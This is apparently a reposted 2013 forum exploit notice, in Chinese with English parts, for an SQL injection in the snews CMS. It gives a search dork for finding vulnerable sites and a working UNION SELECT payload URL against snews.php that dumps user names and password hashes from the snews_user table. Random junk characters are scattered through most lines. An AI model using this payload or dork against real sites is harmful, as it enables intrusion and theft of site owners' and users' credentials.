标题: CMS snews SQL Injection Vulnerability. L: h: |& o/ q1 ^3 U
作者: By onestree" B) M u- x {) |% N
下载地址 : http://snewscms.com/: U0 i0 `4 E; D( l. l* H D0 u- `
测试平台 : ubuntu 12.10 / win 70 T& b0 ]8 n3 d0 A
关键词: inurl:"tanyakan pada rumput yang bergoyang". U. L' ~6 H* ?9 b8 E m
' e8 E" y/ r l+ H2 j
0 Q: K7 l2 Y9 {4 a; O8 o5 u! @% C*************************************************************
5 ?. I1 c% n4 o8 Y! o& k
' e, m/ ]/ g G8 e8 _' iSQL poc:2 M7 f/ n2 z7 x+ }
& ~% }% v( B7 B5 j
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]; X% `9 e" ]; d0 v: h. N
/ t4 m- Q+ K T9 l' v3 l4 W示例
4 q) @2 s3 t# j+ e5 O. S9 {1 _ * Q T6 u F* G& V9 Y# A0 \
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
; L& M' I! J/ a4 U3 o. ]4 k - }6 s) t" Y! u* e
4 B" @! e5 B) B5 n) l致谢:: @0 ^ E7 e" x' q6 N% F; g9 Y& I
3 P5 K. w. T% x7 ^2 h+ F
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell% H7 _9 T" D1 _+ m/ F$ z D
1 c$ ]6 V4 k. p6 C8 F
indonesiancoder - moeslimh4x0r - go-coder6 t) C- e3 E& J9 Q7 I3 j* p8 E
3 s& [6 W a. l) k/ z
spesial my hunny :*
J7 o4 A$ d1 ]: t: `' Z; n |
发表于 2013-1-23 08:55:06
收藏
支持
反对